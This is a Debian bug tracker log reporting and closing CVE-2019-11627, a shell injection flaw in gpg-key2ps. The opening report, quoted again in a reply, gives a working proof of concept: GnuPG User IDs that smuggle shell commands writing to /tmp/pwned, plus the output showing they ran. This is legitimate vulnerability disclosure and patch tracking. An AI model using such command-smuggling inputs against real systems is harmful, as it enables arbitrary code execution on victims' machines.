Debian Bug report logs -
#928256
gpg-key2ps: CVE-2019-11627: Shell injection vulnerability in UIDs rendering
Reported by: Guilhem Moulin <guilhem@debian.org>
Date: Tue, 30 Apr 2019 17:48:04 UTC
Severity: important
Tags: security
Found in versions signing-party/2.9-1, signing-party/2.5-1, signing-party/1.1-1
Fixed in versions signing-party/1.1.10-3+deb8u1, signing-party/2.5-1+deb9u1, signing-party/2.10-1, signing-party/2.10-2
Done: Guilhem Moulin <guilhem@debian.org>
Reply or subscribe to this bug.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org:
Bug#928256; Package signing-party.
(Tue, 30 Apr 2019 17:48:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Guilhem Moulin <guilhem@debian.org>:
New Bug report received and forwarded.
(Tue, 30 Apr 2019 17:48:06 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Package: signing-party
Version: 1.1-1
Severity: important
Tags: security
File: /usr/bin/gpg-key2ps
Stefan `Sec` Zehl disovered an unsafe shell call in gpg-key2ps(1),
enabling shell injection in User-IDs:
$ export GNUPGHOME="$(mktemp --tmpdir --directory)"
$ gpg --passphrase "" --batch --quick-gen-key 'foo"; echo pwned $USER >>/tmp/pwned; echo "bar <user1@example.net>'
$ gpg --passphrase "" --batch --quick-gen-key 'foo `date >>/tmp/pwned` bar <user2@example.net>'
$ gpg-key2ps user1@example.net user2@example.net >/dev/null
$ cat /tmp/pwned
pwned guilhem
Tue Apr 30 19:42:48 CEST 2019
--
Guilhem.
[signature.asc (application/pgp-signature, inline)]
Marked as found in versions signing-party/2.5-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Tue, 30 Apr 2019 19:09:02 GMT) (full text, mbox, link).
Marked as found in versions signing-party/2.9-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Tue, 30 Apr 2019 19:09:03 GMT) (full text, mbox, link).
Added tag(s) pending.
Request was from Guilhem Moulin <guilhem@debian.org>
to control@bugs.debian.org.
(Tue, 30 Apr 2019 19:21:09 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Guilhem Moulin <guilhem@debian.org>:
Bug#928256; Package signing-party.
(Wed, 01 May 2019 06:15:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Guilhem Moulin <guilhem@debian.org>.
(Wed, 01 May 2019 06:15:03 GMT) (full text, mbox, link).
Message #16 received at 928256@bugs.debian.org (full text, mbox, reply):
Control: retitle -1 gpg-key2ps: CVE-2019-11627: Shell injection vulnerability in UIDs rendering
On Tue, Apr 30, 2019 at 07:45:42PM +0200, Guilhem Moulin wrote:
> Package: signing-party
> Version: 1.1-1
> Severity: important
> Tags: security
> File: /usr/bin/gpg-key2ps
>
> Stefan `Sec` Zehl disovered an unsafe shell call in gpg-key2ps(1),
> enabling shell injection in User-IDs:
>
> $ export GNUPGHOME="$(mktemp --tmpdir --directory)"
> $ gpg --passphrase "" --batch --quick-gen-key 'foo"; echo pwned $USER >>/tmp/pwned; echo "bar <user1@example.net>'
> $ gpg --passphrase "" --batch --quick-gen-key 'foo `date >>/tmp/pwned` bar <user2@example.net>'
> $ gpg-key2ps user1@example.net user2@example.net >/dev/null
> $ cat /tmp/pwned
> pwned guilhem
> Tue Apr 30 19:42:48 CEST 2019
CVE-2019-11627 assigned by MITRE.
Regards,
Salvatore
Changed Bug title to 'gpg-key2ps: CVE-2019-11627: Shell injection vulnerability in UIDs rendering' from 'gpg-key2ps: Shell injection vulnerability in UIDs rendering'.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to 928256-submit@bugs.debian.org.
(Wed, 01 May 2019 06:15:03 GMT) (full text, mbox, link).
Reply sent
to Guilhem Moulin <guilhem@debian.org>:
You have taken responsibility.
(Wed, 01 May 2019 10:51:07 GMT) (full text, mbox, link).
Notification sent
to Guilhem Moulin <guilhem@debian.org>:
Bug acknowledged by developer.
(Wed, 01 May 2019 10:51:07 GMT) (full text, mbox, link).
Message #23 received at 928256-close@bugs.debian.org (full text, mbox, reply):
Source: signing-party
Source-Version: 2.10-1
We believe that the bug you reported is fixed in the latest version of
signing-party, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 928256@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Guilhem Moulin <guilhem@debian.org> (supplier of updated signing-party package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Wed, 01 May 2019 12:21:59 +0200
Source: signing-party
Architecture: source
Version: 2.10-1
Distribution: unstable
Urgency: high
Maintainer: Guilhem Moulin <guilhem@debian.org>
Changed-By: Guilhem Moulin <guilhem@debian.org>
Closes: 928256
Changes:
signing-party (2.10-1) unstable; urgency=high
.
* gpg-key2ps: Security fix for CVE-2018-15599: unsafe shell call enabling
shell injection via a User ID. Use Perl's (core) module Encode.pm instead
of shelling out to `iconv`. (Closes: #928256.)
Checksums-Sha1:
a000ee2d86d2a7ddd0b45c366284b59faf3a1e2c 1953 signing-party_2.10-1.dsc
6baf98f21af48b3aa5b5d26a41c4a87646b7ee94 222778 signing-party_2.10.orig.tar.gz
ad8d291f46b3a2899e3e92f26bcb5033c80e45ea 20812 signing-party_2.10-1.debian.tar.xz
ad05c4707b33e33c4a42864a321efaa6f748da36 6525 signing-party_2.10-1_amd64.buildinfo
Checksums-Sha256:
3e4cc0273071e358c397b6f2bb05abee0c94a01a5c88b718df97de5826764b3e 1953 signing-party_2.10-1.dsc
e19416cbd2bc723593334e2471d311f413794faa751b8b2e452e0792fc0431eb 222778 signing-party_2.10.orig.tar.gz
c8ddc1e0873d072c375787d7b992cfad585d873ada2ecf129741afbd7271be03 20812 signing-party_2.10-1.debian.tar.xz
57216c034f7c9632262e31c7b5b774aa1df45a80b808d3654ee1764f7805a8c8 6525 signing-party_2.10-1_amd64.buildinfo
Files:
c2b47c9762a838504bb7da03de99e052 1953 misc optional signing-party_2.10-1.dsc
9a8861395a81164067a6d88a34f029dd 222778 misc optional signing-party_2.10.orig.tar.gz
50ec0ea54d6a08ae56d0d3a4de088e04 20812 misc optional signing-party_2.10-1.debian.tar.xz
04912484f76a9fe2eb51baf0977c78ba 6525 misc optional signing-party_2.10-1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEERpy6p3b9sfzUdbME05pJnDwhpVIFAlzJc+wACgkQ05pJnDwh
pVLKVQ/+PIWN+aH30cXycMfpFQ3nqlL7hy1EoiUH5nUNQ9xinoN+IYScBYM3a/Vh
ny2IQiChbE57NsZO7c+ZxG0eX+i4WkIwDcxj37nZ94C4o29N83Gu0gYy/syaevs6
AXQ9YRLnCjQvuVJOaKnIwcOhJoWsHf4dLQcEJzitEcGda98LUSG87nManTa7yUVV
WBVpazaw4WaFZjbJclXeHtFLM1aaJnSUGCH/drCj74kqRdT56pcsi56m/oG8bVmC
iiezgopxDarZDL+L8khWComyWyWUWkvbN63csTerombtNKKZ3pfkvJDTWDgyPA0G
x0xtqdF2RM5oY+EcPGh4IrNWvY2c1RgghD3+B2+0lKETI7fU4gn5BaFol99bRzi9
RAeVYDWcpFQ/WHVPfFgSxw6Hi1MyuDskmAtxgjdrVApXK5UUE0UxeAdtY+yjfZ1P
Xj58xsPI1UOW3oIEb05EEoEVYMmr2ET3tnfUsScdmOkLs6MiUfP/vBIs8C3ekh6v
XzcRAR3j/9z5ODOE74Qh4FSFtgyxwEYZnIlpX4ct+q3OaVOUeaM6lGk/NmGawK2d
VgMxWJ+aN958yCWvfhrV1gjYUj7X48k+/Tcqh4Ns318647gox/xgF9hDqyJVMN3U
gbJisOKZnbGZQ0ZAjr3GnIMXO0hq5/GUbUqkuGuwCm4Gy1vnsiQ=
=EhYm
-----END PGP SIGNATURE-----
Marked as fixed in versions 1.1.10-3+deb8u1.
Request was from Guilhem Moulin <guilhem@debian.org>
to control@bugs.debian.org.
(Wed, 01 May 2019 17:57:03 GMT) (full text, mbox, link).
No longer marked as fixed in versions 1.1.10-3+deb8u1.
Request was from Guilhem Moulin <guilhem@debian.org>
to control@bugs.debian.org.
(Wed, 01 May 2019 18:03:03 GMT) (full text, mbox, link).
Marked as fixed in versions signing-party/1.1.10-3+deb8u1.
Request was from Guilhem Moulin <guilhem@debian.org>
to control@bugs.debian.org.
(Wed, 01 May 2019 18:03:04 GMT) (full text, mbox, link).
Reply sent
to Guilhem Moulin <guilhem@debian.org>:
You have taken responsibility.
(Sun, 05 May 2019 13:36:08 GMT) (full text, mbox, link).
Notification sent
to Guilhem Moulin <guilhem@debian.org>:
Bug acknowledged by developer.
(Sun, 05 May 2019 13:36:08 GMT) (full text, mbox, link).
Message #34 received at 928256-close@bugs.debian.org (full text, mbox, reply):
Source: signing-party
Source-Version: 2.10-2
We believe that the bug you reported is fixed in the latest version of
signing-party, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 928256@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Guilhem Moulin <guilhem@debian.org> (supplier of updated signing-party package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Sun, 05 May 2019 15:13:54 +0200
Source: signing-party
Architecture: source
Version: 2.10-2
Distribution: unstable
Urgency: high
Maintainer: Guilhem Moulin <guilhem@debian.org>
Changed-By: Guilhem Moulin <guilhem@debian.org>
Closes: 928256
Changes:
signing-party (2.10-2) unstable; urgency=high
.
* gpg-key2ps: Security fix for CVE-2019-11627: unsafe shell call enabling
shell injection via a User ID. Use Perl's (core) module Encode.pm instead
of shelling out to `iconv`. (Closes: #928256.)
Checksums-Sha1:
cbfe0e33d310f4e460b0524326cb3565a03236df 1953 signing-party_2.10-2.dsc
6baf98f21af48b3aa5b5d26a41c4a87646b7ee94 222778 signing-party_2.10.orig.tar.gz
1cd39383e45d69553c553667541b5bcfba243d26 20820 signing-party_2.10-2.debian.tar.xz
fa5a9caff60e2ca4e5cf8abccaa5f852b0b3bcc1 6603 signing-party_2.10-2_amd64.buildinfo
Checksums-Sha256:
28701115b3339520f31da472f68b35876a8c1688c55dbadf896a1aac446c87ff 1953 signing-party_2.10-2.dsc
e19416cbd2bc723593334e2471d311f413794faa751b8b2e452e0792fc0431eb 222778 signing-party_2.10.orig.tar.gz
05e133cc1a941b6676487c0e91fb60b70e2417f81843aa41245855ccc8de6c97 20820 signing-party_2.10-2.debian.tar.xz
61d677ddf41f3671eac53a8e5c325223de6f421be5f687882fa7ea65fefd7172 6603 signing-party_2.10-2_amd64.buildinfo
Files:
812c243be9fe08204913c72852b5b6cb 1953 misc optional signing-party_2.10-2.dsc
9a8861395a81164067a6d88a34f029dd 222778 misc optional signing-party_2.10.orig.tar.gz
cb7b6cdcc5906a0148c9f9447ed137b8 20820 misc optional signing-party_2.10-2.debian.tar.xz
4bf57883d80e4b193a480d63006aaf3e 6603 misc optional signing-party_2.10-2_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEERpy6p3b9sfzUdbME05pJnDwhpVIFAlzO4iQACgkQ05pJnDwh
pVJj/BAAqQNfJTcb0aNL7qgCzl9Np937g3IC6kuXGJ2Ux/ndGwcd4HHe+jBkMm1w
NZ5ope/Qp+ImwGszdfJY+yrOjYhA9U4z5SZCKsbw+kyJSp6/sHQa0WpbKUGx+iCs
VzdopcNdmJDTTDkMdpRzy7Dm0Bya+Z6wdANy0DYcEScbW5gjyGVC9GzSBr7Hg+OV
Buv8NR18LIKk0aO50FPG5N48Eshk0T0C5O6ACKCBNH9yQJRgE23OrWN7bdIXKVgB
jDX+/L4oYwWhjie8tEu0VbFYb5ZXbEIWlTKyt1w1o+5DHK5VXCZsqKKUZ6UF3GjQ
twd17GIus+sTOlpssyYpqYViMP+hRV6cGiVyginD0zN4IWhORkyToZ+JceV+aBEC
3OGZSEjl9J/BRmGagcBxrGIY8GwQNsy0yxEDZMcjUXZe1l8i2kQKTq2G5ZyfTbED
yUqjnmJC5RMAclhjQoG9i4aluDStqld7M5dL3nQWz03t7ZV98V7iqKEAHNbgSB1d
cfh8YMeQoDa1b3b3QWQQXnIc8qrBOCQA9YqaTGY3MQsIIWTl0ifwGH7SqVYc9AbW
a0gd6iv8wZxignc0jvhPfZgnjAkPoQimEp2UYQ345+wc6ObWWy6cCSlfAOn776dt
rWxIeazyul/1PlE9LiK6auQGQj0GDyOgPXfTNbQOZ/MoXNfGvFA=
=Txd4
-----END PGP SIGNATURE-----
Marked as fixed in versions 1.1.10-3+deb8u1.
Request was from Guilhem Moulin <guilhem@debian.org>
to control@bugs.debian.org.
(Mon, 03 Jun 2019 16:21:03 GMT) (full text, mbox, link).
Marked as fixed in versions signing-party/2.5-1+deb9u1.
Request was from Guilhem Moulin <guilhem@debian.org>
to control@bugs.debian.org.
(Mon, 03 Jun 2019 16:24:01 GMT) (full text, mbox, link).
No longer marked as fixed in versions signing-party/1.1.10-3+deb8u1 and 1.1.10-3+deb8u1.
Request was from Guilhem Moulin <guilhem@debian.org>
to control@bugs.debian.org.
(Mon, 03 Jun 2019 16:27:04 GMT) (full text, mbox, link).
Marked as fixed in versions signing-party/1.1.10-3+deb8u1.
Request was from Guilhem Moulin <guilhem@debian.org>
to control@bugs.debian.org.
(Mon, 03 Jun 2019 16:33:12 GMT) (full text, mbox, link).
Reply sent
to Guilhem Moulin <guilhem@debian.org>:
You have taken responsibility.
(Sat, 08 Jun 2019 17:36:12 GMT) (full text, mbox, link).
Notification sent
to Guilhem Moulin <guilhem@debian.org>:
Bug acknowledged by developer.
(Sat, 08 Jun 2019 17:36:12 GMT) (full text, mbox, link).
Message #47 received at 928256-close@bugs.debian.org (full text, mbox, reply):
Source: signing-party
Source-Version: 2.5-1+deb9u1
We believe that the bug you reported is fixed in the latest version of
signing-party, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 928256@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Guilhem Moulin <guilhem@debian.org> (supplier of updated signing-party package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Wed, 01 May 2019 12:55:42 +0200
Source: signing-party
Binary: signing-party
Architecture: source
Version: 2.5-1+deb9u1
Distribution: stretch
Urgency: medium
Maintainer: Guilhem Moulin <guilhem@debian.org>
Changed-By: Guilhem Moulin <guilhem@debian.org>
Description:
signing-party - Various OpenPGP related tools
Closes: 928256
Changes:
signing-party (2.5-1+deb9u1) stretch; urgency=medium
.
* Backport security fix for CVE-2019-11627: unsafe shell call enabling shell
injection via a User ID. Use Perl's (core) module Encode.pm instead of
shelling out to `iconv`. (Closes: #928256.)
Checksums-Sha1:
dc4ac1cdec8e3e7863577f7436f92812339c947e 1983 signing-party_2.5-1+deb9u1.dsc
c8b0852484ecf8b786be0d780a8750d473aef6eb 20220 signing-party_2.5-1+deb9u1.debian.tar.xz
63b84f61f1c297fa22a5dc888da4ed1be14c51d2 6872 signing-party_2.5-1+deb9u1_amd64.buildinfo
Checksums-Sha256:
00cd0e25c88df8a2f5142b6f2f1a25e5c0b4e92aa78ef2245d662fb259448cc4 1983 signing-party_2.5-1+deb9u1.dsc
5634b87ab930b088be6f49de76b256025e74430f0925bc10f28c451ff1e1cbf0 20220 signing-party_2.5-1+deb9u1.debian.tar.xz
676392de516b75506e383d9055c379f3852ca9c9d511b105de30efc1117df6f7 6872 signing-party_2.5-1+deb9u1_amd64.buildinfo
Files:
2a3c4e3072e621fa853321a38468e9a1 1983 misc extra signing-party_2.5-1+deb9u1.dsc
3e43828793e299362a1e9be8fa2fbca8 20220 misc extra signing-party_2.5-1+deb9u1.debian.tar.xz
1ca7d4abedb08c2fb8ddbde6fa900ca2 6872 misc extra signing-party_2.5-1+deb9u1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEERpy6p3b9sfzUdbME05pJnDwhpVIFAlzJh4YACgkQ05pJnDwh
pVIrOA//V94e+Q6e2E4fuLcgob7zLGS5im9af8Q6YTZWNSrRMmvtPmGdXrgyqkd2
heLXO1+ktMAtmsgvoEfdJM7QIstbBWgMbBfH/wsdUrcF8P2YSDzcsz7BufbdRVGz
tgt0KSPXWCxROtjZ1uKkLZ6bftT164JCWaWhYI+IGiOEXtLkwGrqVE2qGMU1S91x
vnIyUKOO/90Ge9Cr2Fd8e5mWKhyg9SLYjB9pyyjDYc1HaabBktz2nZBivRznWeys
6oXFKwULFIzPlcJNwayX+A33ifHWhkgC8MJfLHVv6XsvF0UMa2o4pH5I8cnhLsuy
zFWF5EQFUB1lw/fjlWWUsM3Hw/Bot6ZDBoGQ6sY61T2iFo5mtinPNFcS+MugI8I6
vXbLN5w4Mbem1CpTpwIfyiy9lc8MnezkyJKEP2f0P6TlwjA8c9vvbMroCxW8/RqY
AEtFFAeHihwzC2Q3ODcga0Kf9HN7zdhVvCNLg7YPFmAVtvfgGFlPCrQhEDmFT1N1
0gmUMlUanF4khlR6HuT6Z9CFZVHRRveuN5vKFy7+aqpKLEiViUlk4sDwnd74P/2p
Rkr+VoxFCYmoOJP/9gM+S43uZWFfm5OfsRQH1TLOqFBOf1QtPHbT9m5aqRi3PFHt
CHsHmHAIm8kn1jklVOpyOKlE6shSsvVGbkTIrboYbLfXFGUKaMo=
=Sqmg
-----END PGP SIGNATURE-----
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 16:40:49 2019;
Machine Name:
beach
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon